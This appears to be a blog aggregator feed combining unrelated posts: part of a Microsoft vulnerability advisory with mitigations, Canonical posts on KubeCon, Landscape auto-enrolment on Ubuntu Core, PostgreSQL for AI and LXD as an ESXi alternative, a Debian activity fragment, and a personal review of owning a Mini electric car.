NTLM (NT LAN Manager) authentication protocol is a proprietary protocol developed by Microsoft dating back to the Windows NT operating system, which was released in 1993. NTLM was replaced as the default authentication protocol in Windows 2000 by Kerberos. The Net-NTLMv1 and Net-NTLMv2 protocols employ the user’s base password, stored as a hash (called the NTHash) in a challenge response authentication handshake to verify an authorized user. A detailed description of the algorithms used in Net-NTLMv1 and Net-NTLMv2 can be found on the medium platform.
Net-NTLMv2 (NT LAN Manager version 2) is an improvement over the older NTLM protocol, offering better security features against certain types of attack. Net-NTLMv2 is still supported by various Microsoft products and services within Windows-based networks. However, due to the potential for simple replay attacks using stolen credentials [CWE-294], NTLM has already been directly issued a CVE (CVE-2021-31958) itself and its use presents serious security risk to unauthorized access. Also, considering that Microsoft officially acknowledged the security risks of NTLM in 2021, it should broadly be considered as a vulnerable protocol and it should be replaced with a more secure public-key based authentication wherever it is in use.
Some of the key products that still support the use of Net-NTLMv2: include all Windows operating systems, Active Directory (AD), Microsoft Exchange Server, Microsoft SQL Server, Internet Information Services (IIS), SMB Protocol, Remote Desktop Services, and other third-party applications.
Mitigating CVE-2024-21410
The 2024 H1 Cumulative Update 14 (CU14) for Exchange Server 2019 has been released by Microsoft allowing operators of the affected versions to patch their vulnerable product. The CU14 update enables Extended Protection for Authentication (EPA) by default which had otherwise required manual setup.
If installing CU14 is not feasible or for administrators of Exchange Server 2016, the Exchange Extended Protection documentation and ExchangeExtendedProtectionManagement.ps1 script can be used to enable EPA for Exchange Servers. Microsoft also points to its own workaround techniques for mitigating pass-the-hash attacks in reference to mitigating the risk of CVE-2024-21410.
Pivoting From CVE-2024-21410 to CVE-2024-21378
It’s also probable that attackers who can gain unauthorized access to a vulnerable Microsoft Exchange server could continue their exploit chain by leveraging another vulnerability disclosed in the February 2024 group; CVE-2024-21378 (CVSS 8.0 High) to cause high impact to endpoints running Microsoft Outlook 2016 client or Microsoft Office 365 (2016 Click-to-Run). CVE-2024-21378 is a remote code execution vulnerability that requires user interaction. Also, a prerequisite for exploiting CVE-2024-21378 is authenticated access to a Microsoft Exchange server or other Microsoft LAN service allowing an attacker to compromise users on the same domain controller via delivery of a malicious file. Furthermore, CVE-2024-21378 can be exploited simply by previewing the malicious file.
Greenbone can identify systems affected by CVE-2024-21378 with local security checks for Microsoft Outlook 2016 and Microsoft Office 365 (2016 Click-to-Run).
CVE-2024-21351 Windows SmartScreen Security Bypass
CVE-2024-21351 (CVSS 7.6 High) is a remote code execution (RCE) vulnerability in the Windows SmartScreen security feature. Exploiting CVE-2024-21351 could expose sensitive data and compromise file integrity and availability. This requires human interaction. The victim must click to open a malicious file delivered by the attacker. CVE-2024-21351 was added to CISA’s catalog of known exploited vulnerabilities (KEV) on February 13, 2024 along with CVE-2024-21412.
CVE-2024-21412 Internet Shortcut Files Security Bypass
CVE-2024-21412 (CVSS 8.1 High) is a vulnerability in the security feature of Internet Shortcut Files that allows an unauthenticated attacker to distribute a specially crafted file intended to circumvent visible security measures. While the attacker cannot compel a user to access content under their control, they must persuade the user to actively click on the file link to initiate the exploit.
Mitigating CVE-2024-21351 and CVE-2024-21412
CVE-2024-21351 and CVE-2024-21412 can be patched by installing Microsoft’s February 2024 cumulative patch. Known as “Patch Tuesday”, Microsoft issues cumulative patches on the second Tuesday of each month. Since Windows 7 is past end-of-life support from Microsoft, patches will not be issued to remediate these vulnerabilities. Affected versions of Microsoft Windows that will receive patches include:
06 March, 2024 01:14PM by Joseph Lee
Join Canonical, the publishers of Ubuntu, as we proudly return as a gold sponsor at KubeCon + CloudNativeCon EU 2024. Hosted by the Cloud Native Computing Foundation, the conference unites adopters and technologists from top open source and cloud-native communities. Mark your calendars for March 20-22, 2024, as we gather in Paris for this exciting event.
Canonical, the publisher of Ubuntu, provides open source security, support and services. Our portfolio covers critical systems, from the smallest devices to the largest clouds, from the kernel to containers, from databases to AI. With customers that include top tech brands, emerging startups, governments and home users, Canonical delivers trusted open source for everyone.
Engaging with cloud-native enthusiasts and open source communities is a cornerstone of our mission. We’re excited to connect with attendees at KubeCon EU to share insights, foster collaboration, and contribute to this vibrant ecosystem.
Ubuntu containers are designed for modern software deployment. Our container portfolio ranges from an ecosystem of base OCI images, ultra-optimised chiselled container images to our long-term supported Docker images .
While building applications, developers can rely on Ubuntu’s seamless containerisation experience from development to production, while getting timely updates, security patches and long term support with a consistent, predictable lifecycle and support commitment.
Chiselled Ubuntu is where ultra-small meets ultra-secure. Developers can keep building with Ubuntu and rely on Chisel to extract an ultra-small, bitwise identical image tailored for production. No more worries about library incompatibilities, just seamless development to deployment.
At Canonical, our aim is to streamline Kubernetes cluster management by removing unnecessary manual tasks. Be it the developer workstation, the data centre, the cloud or an IoT device- deploying applications on Kubernetes should not be a different experience just because the infrastructure changes.
MicroK8s is a lightweight Kubernetes distribution that enables you to run enterprise-grade Kubernetes on your laptop, Raspberry Pi, or in any public cloud while consuming minimal resources. MicroK8s applies security updates automatically by default, and rolls them back on failure.
That’s not all. We understand how maintaining Kubernetes upgrades can extract a toll on development efficiency. With MicroK8s you can upgrade to a newer version of Kubernetes in a single command.
The Linux Foundation recently published a report that confirms that almost half the organisations prefer open source solutions for GenAI initiatives. Open source enables organisations to iterate faster and accelerates project delivery, by taking away the burden of licensing and tool accessibility. Yet, GenAI comes with several challenges, such as the need for extensive compute resources and associated costs . To optimise the use of their compute resources, organisations need efficient and scalable AI infrastructure, from bare metal to Kubernetes to their MLOps platforms. Our Kubeflow distribution, Charmed Kubeflow, is designed to run on any infrastructure, enabling you to take your models to production in the environment that best suits your needs.
Canonical also works with leading silicon vendors like NVIDIA to optimise its open source solutions for AI infrastructure and enable efficient resource utilisation. This is especially relevant for large-scale deployments, where a large number of GPUs live under the same cluster.
Join Maciej Mazur’s keynote at KubeCon EU on 22 March, to see how all layers of the stack can be optimised for AI/ML workloads. The ratio increase of GPU sharing in the open source world will be the subject of his talk. During the talk, Maciej will cover some pitfalls, best practices, and recommendations based on four projects of similar scale.
From the hardware layer, which benefits from networking capabilities such as NVIDIA MIG to Kubernetes schedulers such as Volcano, Maciej will go through different opportunities organisations have to optimise their infrastructure for AI workloads and scale their projects. MLOps platforms like Charmed Kubeflow go a level beyond and enable application layer optimisation. For instance, Charmed Kubeflow provides access to frameworks like PaddlePaddle, which distributes training jobs in a smarter way.
Whether you’re building new products or AI models, it’s crucial to ensure that the pace of innovation is not hindered by security vulnerabilities. That’s why Canonical’s open source solutions come with reliable security maintenance, so you can consume the open source you need at speed, securely.
Meet our team to learn more about Ubuntu Pro, our comprehensive subscription for open source software security. With Ubuntu Pro organisations reduce their average CVE exposure from 98 days to 1 day (on average). It enables development teams to focus on building and running innovative applications with complete peace of mind.
If you are attending KubeCon EU in Paris between 20-22 March, make sure to visit booth E25. Our team of open source experts will be available throughout the day to answer all your questions.
You can already book a meeting with our team member Teresa Lugnan using the link below.
Canonical recently released the Landscape Client snap which, along with the new snap management features in the Landscape web portal, allows for device management of Ubuntu Core devices. In this blog we will look at how this can be deployed at scale by building a custom Ubuntu Core image that includes the Landscape Client snap and how to configure the image to automatically enrol the device after its first boot.
This blog follows the tutorial Build your own Ubuntu Core image, which shows how to create a custom image for a Raspberry Pi.
As we are following the tutorial we will have already set up our Ubuntu One account and now we are ready to create our model assertion. This is the recipe that describes all the components that comprise our image and will therefore need the Landscape Client to be added into the mix.
We will base this example on a Raspberry Pi running Ubuntu Core 22, and so we will start with the reference model file we can download with:
wget -O my-model.json https://raw.githubusercontent.com/snapcore/models/master/ubuntu-core-22-pi-arm64.json
Now we need to edit the model file, again following the tutorial we set our authority-id and brand-id to our developer id.
{
"type": "model",
"series": "16",
"model": "ubuntu-core-22-pi-arm64",
"architecture": "arm64",
"authority-id": "<your id>",
"brand-id": "<your id>",
"timestamp": "2022-04-04T10:40:41+00:00",
"base": "core22",
"grade": "signed",
"snaps": [
{
"name": "pi",
"type": "gadget",
"default-channel": "22/stable",
"id": "YbGa9O3dAXl88YLI6Y1bGG74pwBxZyKg"
},
{
"name": "pi-kernel",
"type": "kernel",
"default-channel": "22/stable",
"id": "jeIuP6tfFrvAdic8DMWqHmoaoukAPNbJ"
},
{
"name": "core22",
"type": "base",
"default-channel": "latest/stable",
"id": "amcUKQILKXHHTlmSa7NMdnXSx02dNeeT"
},
{
"name": "snapd",
"type": "snapd",
"default-channel": "latest/stable",
"id": "PMrrV4ml8uWuEUDBT8dSGnKUYbevVhc4"
}
]
}
Having gotten our base image definition we want to add the Landscape Client by adding this stanza to the snaps list. As the Landscape Client is currently in beta and doesn’t have a stable release yet, we will specify that with the default-channel parameter. The id parameter is unique to each snap with the value shown below belonging to the client. If you need to find the id of any other snap, you can use the snap info <snap-name> command in your terminal and look for the snap-id.
{
"name": "landscape-client",
"type": "app",
"default-channel": "latest/beta",
"id": "ffnH0sJpX3NFAclH777M8BdXIWpo93af"
}
Now we have our model assertion, we could sign this and build an image and we would have the Landscape Client. However, it would only have a default configuration that wouldn’t do much, leaving us having to manually configure the client. This works perfectly well, but what if we don’t want to have to access each device and do this? Can we pre-configure the client when we build our image? Also, can we make the client automatically enrol without any external intervention?
Of course, the answer to these questions is yes. Yes, we can. We just need to create our own gadget snap.
The gadget snap is a special type of snap that contains device specific support code and data. You can read more about them here in the snapcraft documentation.
This example is based on the official Ubuntu Core 22 gadget snap for the Pi. Fork this repository to your local environment and we can configure it for our needs.
Essentially, all we need to do is append the following configuration at the bottom of the gadget.yaml file that defines the gadget snap:
defaults:
# landscape client
ffnH0sJpX3NFAclH777M8BdXIWpo93af:
landscape-url: <landscape-url>
account-name: <account-name>
registration-key: "<registration-key>"
auto-register:
enabled: true
computer-title-pattern: test-${model:7}-${serial:0:8}
wait-for-serial-as: true
Don’t forget to replace the placeholder values like <landscape-url> with the relevant config values.
The first part of the configuration defines the details of the Landscape server instance we’ll be using and will be the same for all devices that run this image. After this we want to configure the automatic registration component so that the device will register itself with the server shortly after being started up for the first time.
We have three parameters in this example. The first one enables the auto-registration on first boot. The second one, computer-title-pattern, allows us to define the computer title for this specific device.
The pattern uses the bash shell parameter expansion format to manipulate the available parameters. In this example the computer title will be set to the string “test-” followed by the device model starting from the 8th character (see our model assertion) and then the first 8 characters of the device serial number taken from its serial assertion.
For example, in this case it would something like: test-core-22-pi-arm64-f6ec1539
The fields available are listed below. The final parameter though, wait-for-serial-as, tells the auto registration function to wait until the device has been able to obtain its serial assertion from a serial vault before trying to create the title and perform the registration. This is necessary as a completely fresh device will not initially have a serial assertion.
Parameter | Description |
serial | Serial from device’s serial assertion |
model | model id from device’s serial assertion |
brand | brand-id from device’s serial assertion |
hostname | device’s network hostname |
ip | device’s IP address of primary NIC |
mac | device’s MAC address of primary NIC |
prodiden | Product identifier |
serialno | Serial Number |
datetime | date/time of auto-enrolment |
Now we have our configuration for Landscape all set up, we just need to build the gadget snap. This simply requires the following command to be run in the base folder of your local gadget snap repository:
$ snapcraft
After some whirring, you will have your snap and this is the one we want to include in our model assertion.
With our current model assertion, when we build our image, we will go off to the Snap Store and download the listed snaps and include them in the image, including the reference gadget snap. Now we have our own gadget snap, we want to use this one instead.
If you have your own brand store, you can publish your custom gadget snap there. Then change the name and id of the gadget snap in your model assertion and all will be well. If you do not have your own brand store, the process is a little more manual. It is not permitted to upload custom gadget snaps to the global snap store so we will have to use our local .snap file.
The first step is to set the grade of the snap to “dangerous”. This is because your custom gadget snap will not have been signed by the global snap store or a brand store and its provenance can not be verified except by yourself.
"grade": "dangerous",
"snaps": [
{
"name": "pi_22-2_arm64",
"type": "gadget",
},
Next, remove the snap-id and default-channel values as these are related to downloading from a store. Finally, update the name to that of your snap filename.
If you don’t have a signing key yet, run the following command to create one:
$ snapcraft create-key <key-name>
Next, we’ll sign the model assertion by running:
$ snap sign -k <key-name> model.json > landscape.model
Finally, we’ll build the custom Ubuntu Core image from the signed model using the ubuntu-image tool. If you do not have this already it can be installed using the snap install ubuntu-image command.
Ubuntu-image will take our signed model assertion, download all the required snaps and compile them all together into an image file. As we want to use a local snap, we will have to tell it where to find that snap file so we will need the –snap flag. In this case let’s assume the snap file is in the same directory as our signed model assertion.
ubuntu-image snap --snap pi_22-2_arm64.snap landscape.model
This will produce the image pi.img which is ready to be written to an sd card and inserted into our Raspberry Pi.
There are various tools for writing this image to an sd card, the quickest is probably to use the startup image creator that is included with most Ubuntu variants and can be found in your app drawer (if not, it is available from the snap store). Select your img file and your target sd card and click “Make Startup Disk”.
Take your freshly written SD card with the image and put it into your Raspberry Pi. Turn the device on and after a short delay your device should appear fully registered with your Landscape Server.
By following this process we can quickly and easily create an Ubuntu Core device that only needs a power cable and a network cable plugged into it for it to automatically get itself into a state where it can be remotely managed and maintained. This functionality is essential if attempting to deploy a large fleet or installing devices in inaccessible areas.
For more information on the power and capabilities of Ubuntu Core check out: Ubuntu Core.
For more information on the features and functionality of Landscape check out: Landscape | Ubuntu.
Are you interested in running Ubuntu Core with Landscape management on your devices and are working on a commercial project? Get in touch with our team today.
Ubuntu Core as an immutable Linux Desktop base
Managing software in complex network environments: the Snap Store Proxy
Manage FIPS-enabled Linux machines at scale with Landscape 23.03
If you’re working with AI, you’re working with data. From numerical data to videos or images, regardless of your industry or use case, every AI project depends on data in some form. The question is: how can you efficiently store that data and use it when building your models? One answer is PostgreSQL, a proven and well-loved database that, thanks to recent developments, has become a strong choice to support AI.
PostgreSQL is an open-source, highly capable database system that supports different features like foreign keys, subqueries, triggers, and different user-defined types and functions. In recent years, PostgreSQL enjoyed large popularity in the database landscape, winning database management system (DBMS) of the year in 2023.
PostgreSQL has applications across all industries, such as finops and e-commerce. It also fits a variety of workloads like online transaction processing, analytics and geospatial data. The solution’s widespread adoption has led to the development of new extensions and libraries for many specific use cases –including machine learning.
[Watch our webinar about PostgreSQL for AI Applications]
PostgreSQL has more than 1000 extensions. They are add-on modules that enhance the functionality of the database solution, providing additional features, data types, functions, and operators that are not present in the core Postgres system. From handling of geospatial data to transforming PostgreSQL to a vector database, various enhancements are available. The capabilities of the extensions cover a wide range, including analytics and search.
The flexibility and breadth of features that these extensions provide unlock the tremendous potential to enhance your AI projects.
Some of the most relevant extensions for AI:
MLOps is DevOps for machine learning. MLOps platforms such as Kubeflow ingest data from different types of databases, including PostgreSQL. Additionally, they use databases to store part of their artefacts, including metadata spanning experiments, jobs, pipeline runs and single scalar metrics. Kubeflow and your database need to be reliable and seamlessly integrated, since their availability influences the ability to run ML projects in production.
PostgreSQL is a great database to use alongside Kubeflow, but that doesn’t mean it’s the best choice in every scenario. In practice there are also other viable options, for instance MySQL. When choosing which database you’ll use, prioritise the solution that makes the most sense for your organisation:
There are other considerations about MySQL and PostgreSQL that you can read about in this whitepaper.
The Charmed PostgreSQL Operator delivers automated operations management from day 0 to day 2 on the PostgreSQL Database Management System. It is an open source, end-to-end, production-ready data platform on top of Juju. It comes in two flavours to deploy and operate PostgreSQL on physical/virtual machines and Kubernetes. Both offer features such as replication, TLS, password rotation, and easy-to-use integration with applications.
The Charmed PostgreSQL Operator meets the need for deploying PostgreSQL in a structured and consistent manner while allowing the user flexibility in configuration. It simplifies deployment, scaling, configuration and management of PostgreSQL in production at scale in a reliable way. PostgreSQL on its own is a great choice for AI projects, and the Charmed Operator takes it to the next level, making it even easier to store your data and build ML models.
AI in 2024 – What does the future hold?
The VMware world has seen a lot of upheaval in recent months, and now there’s another change to add to the list: the ESXi hypervisor, one of VMware’s most notable products, is no longer free.
VMware ESXi is a type 1 hypervisor that allows users to create and manage virtual machines that can access hardware resources directly. It comes with various management tools, the most familiar being vSphere and vCenter Server, and supports many advanced features such as live migration, high availability, and various security options among others.
The free option for ESXi only covered a limited number of cores, with other limitations in terms of memory and management options. As such, rather than being used in production, it was mostly used by developers and hobbyists who are now left looking for an ESXi alternative.
While LXD is mostly known for providing system containers, since April 2020 and the 4.0 LTS, it also natively supports virtual machines. VM support was initially added to expand the variety of use cases LXD could cover, such as running workloads in a different operating system, or with a different kernel than that of the host, but over the years we have been enhancing the experience and making LXD a modern open source alternative to usual hypervisors.
While the main functionality doesn’t differ much from other VM virtualization tools, we want to provide a better experience out of the box with pre-installed images and optimised choices. The workflow is fully image-based, and in addition to the images provided through a built-in image server, users can also upload custom ISO images for their specific use cases. For easy management, in addition to an intuitive CLI, LXD now also provides a web user interface.
LXD VMs are based on KVM through QEMU, like other VMs you would get through libvirt and similar tools. However, LXD is opinionated about the setup and the experience, placing security at the forefront, which is why we use a modern Q35 layout with UEFI and SecureBoot by default. All devices are virtio-based (we don’t do any complex device emulation at the host level).
Recently, we have also added an option for running non-UEFI based workloads, allowing users to run less modern virtual machines without issues, provided that they specifically enable the security option allowing them to do so.
Why pick LXD as an ESXi alternative? Because LXD is fully open source, with its full functionality available without any restrictions. For enterprise use cases, you can opt-in to get support from Canonical via Ubuntu Pro, but you can also consume LXD entirely for free.
It is difficult to provide a comprehensive comparison with all ESXi features, as they vary between versions and specific combinations with other VMware tools. Nevertheless, the table below provides a summary of the most important ESXi features and how they are supported in LXD.
LXD | ESXi | |
Software type | Open Source | Proprietary |
Basis | KVM | VMkernel |
Web UI | Yes | Yes |
Clustering | Yes | Yes |
High availability | Yes | Yes |
VM live migration | Yes | Yes |
Shared storage | Ceph | vSAN |
Networking | Bridge, OVN | NSX |
Snapshots | Yes | Yes |
Backup | Yes | Yes |
Free trial | N/A (unlimited free usage) | 30 days |
Pricing | Free, with enterprise support available on a per physical host basis | Full functionality requires a paid licence, differing based on the number of cores |
Next, let’s take a closer look at LXD’s capabilities:
LXD is very easy to set up. Four simple steps are all it takes to get ready to run workloads:
1. On Ubuntu, just run
snap install lxd
2. Then run:
lxd init
This will prompt you to configure your LXD instance. Default options are sufficient in many cases, but make sure to select “yes” when asked whether LXD should be available over the network. This will allow you to access the Web UI.
3. Access the UI in your browser by entering your server address (for example, https://192.0.2.10:8443), and follow the authentication prompts.
4. Click on “create instance” to launch your first VM
While you might be looking for an ESXi alternative, we also understand that users will wish to keep their existing workloads currently running on ESXi (or elsewhere). To import your existing VMs, LXD provides a tool (lxd-migrate) to create a LXD instance based on an existing disk or image. Using this tool, with some extra configuration users are able to import their existing VMs. More details are available in this guide.
While LXD is primarily a Linux-based tool, it is also available for Windows users via WSL. WSL allows users to have the full Ubuntu experience on their Windows machines. Here is a practical example of how you can work with web services using WSL and LXD.
If you’re reading this blog, your primary interest is likely to be virtual machines. But system containers are a great alternative that could potentially cover many of your use cases.
System containers are in a way similar to a physical or a virtual machine. However, they utilize the kernel of the host to provide a full operating system and have the same behaviour and manageability as VMs, without the usual overhead, and with the density and efficiency of containers. For almost any use case, you could run the same workload in a system container and not get any of the overhead that you usually get when using virtual machines. The only exception would be if you needed a specific version of the kernel, different from the kernel of the host, for a specific feature of that virtual machine.
If you are curious about learning more, refer to this blog about Linux containers, or this one covering the differences between virtualization and containerization.
LXD has come a long way since its inception and nowadays covers much more than system containers. It is a modern, secure and robust ESXi alternative and also to traditional hypervisors. With its intuitive CLI and web interface, users can easily get started and deploy and manage their workloads easily and intuitively. ESXi users, as well as others looking for a competent, open source virtualization option, should take LXD for a spin.
Learn more about LXD on the LXD webpage or in the documentation.
Learn more about LXD UI.
Curious about using LXD for development, read about it in LXD for beginners.
Curious about some practical use cases, read how you can use LXD to build your ERP.
05 March, 2024 06:09AM by aida
Welcome to Purism, a different type of technology company. We believe you should have technology that does not spy on you. We believe you should have complete control over your digital life. We advocate for personal privacy, cyber security, and individual freedoms. We sell hardware, develop software, and provide services according to these beliefs. To […]
The post Purism Differentiator Series, Part 6: Security appeared first on Purism.
04 March, 2024 08:16PM by Todd Weaver
Two months into my new gig and it’s going great! Tracking my time has taken a bit of getting used to, but having something that amounts to a queryable database of everything I’ve done has also allowed some helpful introspection.
Freexian sponsors up to 20% of my time on Debian tasks of my choice. In fact I’ve been spending the bulk of my time on debusine which is itself intended to accelerate work on Debian, but more details on that later. While I contribute to Freexian’s summaries now, I’ve also decided to start writing monthly posts about my free software activity as many others do, to get into some more detail.
man
now restricts the system calls that
groff
can execute and the parts of the file system that it can access.
I stand by this, but it did cause some problems that have needed a
succession of small fixes over the years. This month I issued
DLA-3731-1,
backporting some of those fixes to buster./etc/ssh/sshd_config
. This turned out to be
resolvable without any changes, but in the process of investigating I
noticed that my dodgy arrangements to avoid
ucf prompts in certain cases
had bitrotted slightly, which meant that some people might be prompted
unnecessarily. I fixed this and arranged for it not to happen
again.time_t
transition for now, but
once that’s out of the way it should flow smoothly again.04 March, 2024 06:55AM by aida
tl;dr I have had a Mini EV for a little over two years, so I thought it was time for a retrospective. This isn’t so much a review as I’m not a car journalist. It’s more just my thoughts of owning an electric car for a couple of years.
I briefly talked about the car in episode 24 of Linux Matters Podcast, if you prefer a shorter, less detailed review in audio format.
Patreon supporters of Linux Matters can get the show a day or so early, and without adverts. 🙏
In August 2020, amid [The Event]
, and my approaching 50th birthday, I figured it was about time for a mid-life crisis. So, after a glass of wine, late one evening, I filled in a test-drive request form for a Tesla electric car.
I was surprised to get a call from a Tesla representative the next day to organise the booking. A week later, I turned up at the nearest Tesla “dealership” in an industrial estate near Heathrow Airport to pick up the car.
I had maybe twenty minutes to drive the car alone, on a fixed route, and then bring it back. I’d never driven a fully electric car before that, nor even been in one as a passenger, that I recall. I’ve been in countless Toyota Prius over the years as the go-to taxi for the discerning cabbie.
I had no intention of buying the car, so we parted ways after the drive. The salesman was phlegmatic about this. He said it didn’t matter because now I’ve driven one and had a positive experience, I’d be more likely to rent a Tesla or talk about the experience with friends.
Not yet done the former; definitely have done the latter.
A year later, my pangs for a new car continued. I also took a Citroen EC5 out for a spin and borrowed a Renault ZOE. Both were decent cars, but not really what I was after. The Citroen was too big, and the ZOE had an ugly, fat arse-end.
Then I took a look at the Mini. Initially, it wasn’t on my radar, but then I watched every video review and hands-on I could find. I was almost already sold on it when I took one out for a test drive. Indeed, after telling the amiable and chilled sales guy which cars I’d already test-driven, he said, “If you drive the Mini, you’ll buy it, not the others”.
“That is a bold claim!”, I thought.
He was right though. I bought one. Here it is some months later, at a “favourite” charging spot late one night.
I’ve had many cars over the years, some second-hand, a few hand-me-downs in the family, but never a new car for me, for my pleasure. I do enjoy driving, but less so commuting in traffic, which is handy now I’ve worked from home for over a decade.
Now the kids are grown up, and the wife has a slightly larger car if we all go somewhere. I can get away with a two-door car.
I went for the “2021 BMW Mini Cooper Level 3”, as it’s known officially. The design is from 2019 and has been replaced in 2024. Level 3 refers to the car’s trim level and is one of the highest. There were a few additional optional extras, which I didn’t choose to buy.
The one option I wish I’d got is adaptive cruise control, which is handy on UK motorways. Dial in a speed and let the car adjust dynamically as the car in front slows or speeds up. My wife’s car has it, and I am mildly kicking myself I didn’t get it for the Mini.
The full spec and trim can be seen in the BMW PDF. Here’s the page about my car’s specifications. Click to make it bigger.
I went for black paint and the “3-pin plug” inspired wheels. They’re quite quirky and look rather cool at low speed due to their asymmetry. Not that I see that view often, as I’m usually driving.
Here’s what it looks like when you’re speccing up the Mini online. This is a pretty accurate representation of the car.
The most important part of a car is how it drives. I love driving this thing. The Mini EV is tremendously fun to drive. It’s relatively quick off the mark, which makes it great for safe overtaking. Getting away from the lights is super fun too.
Being an EV, it’s got a heavy battery, so it’s doesn’t skip around much on the road. I’ve always felt in control of the car, as it drives very much like a go-cart, point-and-shoot.
Without a petrol engine, there’s certainly less noise and virbration while driving. Road and wind noise is audible, but it’s pretty pleasantly quiet when pootling around town. As required by law, it makes some interesting “spacey” noises at low speed, so pedestrians can hear you coming. Although I’ve surprised a few people and animals when they couldn’t.
Unlike the four-door Mini Clubman, it’s got long rimless doors, which make for getting in and out a bit easier. They also look cool. I’ve always enjoyed the look of a two-door coupe or hatchback car with rimless front windows.
There are four driving modes, Normal (the default), Sport, Green and Green+. Green+ is the eco-warrior mode which turns all the fans off, and reduces energy consumption quite a bit, extending the overall range. Sport is at the other end of the scale, consuming more power, being more responsive, and lighting the car interior in red, which is cute.
There are two levels of regenerative braking, which is on by default. I never change this setting, but you can. It means I can drive with one pedal, letting the regenerative braking reduce speed as I approach junctions or traffic. I rarely use the brake pedal at all.
The brake lights do illuminate when regenerative braking is occurring, which I’m sure is annoying for the person behind me when I’m hovering between go and stop. The car doesn’t come to a complete stop if you remove your feet from the pedals, so I do have to use the brake pedal to completely stop the car, which is a shame.
London has a Congestion Charge (CC), and (controversial) Ultra Low Emissions Zone (ULEZ). Cars have to pay to enter the centre of London. There are some exceptions. As the Mini is electric, it currently doesn’t have to pay the CC. However in order to qualify for not paying the £15 daily charge, you have to pay a £10 annual charge.
I sometimes use “JustPark” to find interesting places to put the car while I’m in London. Here I found a spot in the grounds of an old church.
I have always loved driving in central London, I’ve used this perk a fair few times to drive into the centre of London for work, to meet friends or go out in the evening. It’s cheaper for me to drive into the centre of London and park than it is to get a return train ticket, which is mad.
It’s a two-door car that can seat two adults comfortably in the front and two kids in the back. Or four adults uncomfortably as the legroom in the back is quite cramped. I never sit in the back, so I don’t care about that.
On the odd occasion, the four of us (two adults and two teenage kids) have been in the car together, it’s been fine. I wouldn’t do a long journey like that, though.
The seats are comfortable, even for a relatively long drive, and being small, everything is very much within reach. I’m almost 6ft tall and fit just fine. However, with the seat far back, my view of traffic lights when in the front of a queue is somewhat limited. The mirror also obscures my view more than most cars, as it’s parallel to my eyes rather than “up and to the left” as it would be in a larger cabin.
There are two sunroofs, each with a manual sliding mesh shade on the underside. The front roof can be tilted or slid open using a switch in the overhead panel. The rear sunroof doesn’t open.
The interior is a mix of retro Mini styling and new fangled screens. It has a big round central circle harking back to the original Mini speedo. Here though, it contains a rectangular display. There are physical controls for air conditioning, seat warmers, parking assistance, media controls, navigation, the lot. While the display is a touch screen, that’s rarely needed when using the built-in software.
It looks like this, but with the steering wheel on the right (correct) side.
I should mention that I don’t like the buttons on the steering wheel, nor those immediately under the display. They’re flat rocker-style ones, which you have to look at to find. The previous generation of Mini had raised round buttons, which are much easier for fingers to find.
The built-in navigation system is pretty trashy, like most cars. I’ve never found a car with a decent navigation system that can beat Android Auto or Apple Car Play. I also like using Waze, Apple Maps, and a podcast app while driving.
In this photo, you can see the navigation display, which highlights the expected current range with the circle around the cars location. Also note the “mode” button which is one of the flat ones I dislike in the car. The lights around the display illuminate to show temperature of the heating, or volume of the audio system, while you adjust it.
One benefit of the onboard navigation system is that driving instructions and lane recommendations appear on the Head-Up Display (HUD) in front of the driver. The downside of mobile apps on the mini is they don’t have access to the HUD, so I have to glance across at the central display to see where I need to turn. Alternatively, I could turn the volume on the mobile map app up, but that would interrupt podcasts in an annoying way.
I suspect this is a missing feature of the BMW on-board software, which may be fixed in a later release. I drove a brand new BMW which had a similar HUD that integrated with the navigation system on my phone. Mine doesn’t have that software though.
The back seats can be folded to provide more boot space, especially in a car with little luggage space. I’ve used the Mini for a ‘big shop’ with the seats folded down and can get plenty of ‘bags for life’ in there, full of groceries.
There’s the usual media controls on one side of the steering wheel, as well as cruise and speed limit control on the other. Window, sunroof and other important controls all have buttons in the expected places. A minimalist button Tesla, this is not.
There’s an induction phone charger inside the armrest. The best part about this is with Apple CarPlay, I can just hide the phone in there, charging, so I’m not distracted while driving. The worst part is I frequently forget the phone is in there, and leave it when walking away from the car.
The Mini is a BEV (battery EV) instead of a PHEV (plug-in hybrid EV) - like a Prius or BMW i3, so it has no petrol engine but relies on the battery powering a single motor to propel the car.
The Mini is sold with only one battery option, a 30KwH capacity with an estimated 140-mile range. There’s a CCS (Combined Charging System (combo 2)) socket under a flap on the rear (right) driver’s side. So it can do slower AC charging or faster DC charging.
The car has all the cables required for charging from a 13-amp socket at home or a 7Kw domestic or public “slow” charger. Faster public chargers have integrated fat cables.
A few days before the car arrived, I had a charger installed at home on the outside wall of the house. I’m fortunate to have a driveway at the front of the house. So I typically park the car on it and plug in when I get out.
Sometimes, I forget or don’t bother if I know the battery still has plenty of charge and I do not have any upcoming long journeys. But more often than not, I try always to plug it in, even if it won’t be charging until the next day.
In my personal experience, most charges are done at home. I have charged in many places away from home, but that’s not very common for me. The last time I checked the stats, it had been around 86% charging at home and 14% on public chargers.
I often take a photo of the car while it’s charging in a public place. Usually to share on social media to spark a conversation about charging infrastructure. On this occasion I was using a charger in the car park at Chepstow Castle.
I know petrol heads often bleat about the very idea of waiting while the car fills up, but sometimes it leads to nice places, like this. This was a pretty slow charger, but I didn’t really care, as I had a castle to walk around!
Sometimes the locations are less pretty. This is Chippenham Pit-Stop, which does a great breakfast while you wait for your car to charge.
My home charger is made by Ohme. It has a display and a few weatherproof buttons to be directly operated without needing an app. However, a few additional features are only available if the app is installed.
The Ohme app can access my energy provider via an API which lets the charger know when is the optimal time to start changing the car, from a pricing perspective. That seems to work well with Octopus Energy, my domestic provider.
It’s possible to define multiple charging schedules to ensure the car is ready for departure at the time you’re leaving.
The Ohme app is also supposed to be able to talk to the BMW API with my credentials, in order to talk to the car. This has never worked for me. I have had calls and emails with Ohme about this, but I gave up in frustration. It just doesn’t work.
That doesn’t stop the car from actually charging though. Indeed, according to the stats in the app (which I only discovered while writing this blog) - I’ve charged for over 720 hours at home in the last twelve months. The dip in November & December is explained below under “Crash repair”.
There are a few issues I’ve had with the car.
The car has its own mobile connectivity, and talks to BMW periodically. But for that to work, you have to successfully pair the car with your phone app. The pairing process between the mobile app and the car itself should just be a case of entering the Vehicle Identification Number in the app. Sadly this didn’t work. I don’t know what was wrong, but it took around two weeks for it to be fixed.
The onboard navigation system had my address wrong. The house number it showed for my home doesn’t exist, and mine wasn’t in the database. The house has been here and numbered correctly for over 50 years. It was only a minor thing because I happened to know where I lived, and how to get there. It just irritated me that my own car, on my driveway, thought it was somewhere else.
I called Mini customer services and they didn’t seem to think it was easily fixable, and I should just hope for a map update.
